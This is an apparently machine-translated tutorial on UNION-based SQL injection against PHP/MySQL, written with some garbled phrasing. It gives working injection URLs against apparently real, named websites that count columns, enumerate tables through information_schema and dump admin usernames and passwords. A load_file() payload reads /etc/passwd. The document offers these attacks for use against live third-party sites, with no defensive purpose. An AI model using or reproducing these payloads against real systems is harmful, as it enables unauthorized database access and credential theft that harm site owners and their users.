Php+mysql Injection Example and theory

First we are talking about logic errors and grammatical errors:

The biggest difference is that the syntax error does not pass the compiler compiler, logic errors can be passed. Specifically, the grammatical error means that the error violates the basic rules of the language, such as the need to end with a point in the language of the semicolon ending statement.

A logical error is an error on an algorithm. For example, the end of the loop statement is not written, the statement can be compiled, but the operation will occur after the death cycle can not jump out of the phenomenon.

Here's an example: http://www.jieyanbar.com/jycs.look.php?ID=293

We add a single quote ' error, which is a grammatical error, because the quotation marks violate the principle of the front opening and closing. Add and+1=2 error, is a logic error, the computer set is 1 can not equal 2.

Next we're talking about union:

First to Baidu search the union. Combines the results of two or more queries into a single result set that contains all the rows of all queries in a federated query. To be honest, Union is the joint query. Select A,b,c from D where xx=1 this 1 is represented above the URL. php?id=1. If there is no good filtering, then the Id=1 union Select will be equal to the front. That is, select A,b,c from D where xx=1 union select 1,2,3 can execute, if not equal, a logical error. For example: http://www.jieyanbar.com/jycs.look.php?ID=293+and+1=1+union+select+1,2,3 He prompts the used SELECT statements have a Different number of columns the field you use for the SELECT syntax is inconsistent, which means that the number of fields you union is only equal to continue, which requires you to keep guessing the numbers. Back to the normal page until you guessed 5.

Next the injection statement:

http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,3,4,5+from+adminhttp://www.jieyanbar.com/ Jycs.look.php?id=-1+union+select+1,2,group_concat (distinct+adminname,0x5c,adminpwd), 4,5+from+admin

First say two functions: Group_concat () is fully explicit. Concat () and Concat_ws () are only shown one. But this method is too stupid, because the table and the name of the field need to guess.

And then talking about the methods of exploding tables and fields:

MySQL has such a information_schema database that stores all of the table segment names and field names inside the database. The name of the table segment in the database is in the Columns table section of the database Information_schema (schema is diagram, plan, schema, outline), the name is table_name and the field name is here, the name of the database column_name

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,3,4,5+from+information_schema.columns in this way, we can start with the + From+information_schema The columns table of the data to concat the content. But the above statement has a disadvantage, that is, the database has several, even INFORMATION_SCHEMA database inside the name of the table is also to concat out. Then add a WHERE statement: Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT (Distinct+table_name), 4,5+from+information_schema.columns+where+table_schema=database (). The database () is the meaning of the databases currently in use. The following details about the structure of INFORMATION_SCHEMA it! Information_schema has a watch called columns. Columns inside the MySQL records all the names of the fields, all of course the records have attributes column_name is the name of the field, TABLE_NAME is the name of the field, Table_schema is the name of the database where the field is located, The Union SELECT GROUP_CONCAT (table_name) from Information_schema.columns is then brought into the injection statement. The problem, however, is that if there are 3 fields in a table X, the records in the A,b,c,information_schema.columns because ABC is three, the table x that they are on appears three times. To avoid repetition, we add a distinct,group_concat (DISTINCT table_name) http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select +1,2,group_concat (Distinct+table_name), 4,5+from+information_schema.columns+where+table_schema=database () The detailed meaning is that the output of the current database, all the TABLE_NAME, alsois what table segments are in the database that the query is now using. Check the table understand, then the search field is simple we look at the above statement, there is a admin table, right? Here we need to take the admin for hex value (that is, change to 16) Select Group_concat (DISTINCT column_name) from Information_schema.columns where Table_ name=0x61646d696e (Admin's 16 prohibition is 0x61646d696e, in SQL can automatically identify hex encoding)

If you do not convert to hex then the Where condition is written: where table_name= ' admin ' quotes will cause problems in the server.

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT (distinct+column_name), 4,5+from+ information_schema.columns+where+table_name=0x61646d696e

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,2,GROUP_CONCAT (distinct+column_name), 4,5+from+ Information_schema.columns+where+table_name= ' admin '

It means the same thing, but it's not the same.

Then there are a few parameters about MySQL:

Generally these parameters, I am directly copied http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,concat (User (), database (), version () ), 3,4,5

Concat (User (), database (), version ())

However, there is a problem, mlyjyb@localhostmlyjy5.0.77 even into a piece, inseparable, this time still have to use hex, choose to use a colon: to separate these three parameters, colon hex is 0x3a

Http://www.jieyanbar.com/jycs.look.php?ID=-1+union+select+1,concat (Database (), 0x3a,user (), 0x3a,version ()), 3,4,5

Of these three parameters, database () is the name of the current database, what is the name of the database that is being used, and what user () is the user (), which is the user name (), and the server version () where the database is located after the Which is 4.x and 5.x.
Then there are two other uses: one is Load_file (). This function is more demanding for permissions, and is usually a common station for stand-alone servers. Load_file () means reading hard disk files as text. Usage is select load_file (' File path ');

For example:

Http://www.nicegirlproject.jp/event_Info.php?id=-1+union+select+1,2,3,4,load_file (0x2f6574632f706173737764), 6,7,8,9,0,11,12

Recommendation: http://blackbap.org/?p=archive&id=41 This is the file structure of Linux